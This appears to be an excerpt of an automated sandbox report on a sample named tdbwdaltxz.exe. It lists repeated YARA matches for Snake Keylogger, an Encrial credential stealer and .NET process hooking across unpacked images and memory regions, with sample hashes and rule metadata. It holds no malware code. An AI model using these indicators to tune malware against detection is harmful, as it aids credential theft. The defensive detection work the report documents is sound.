                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
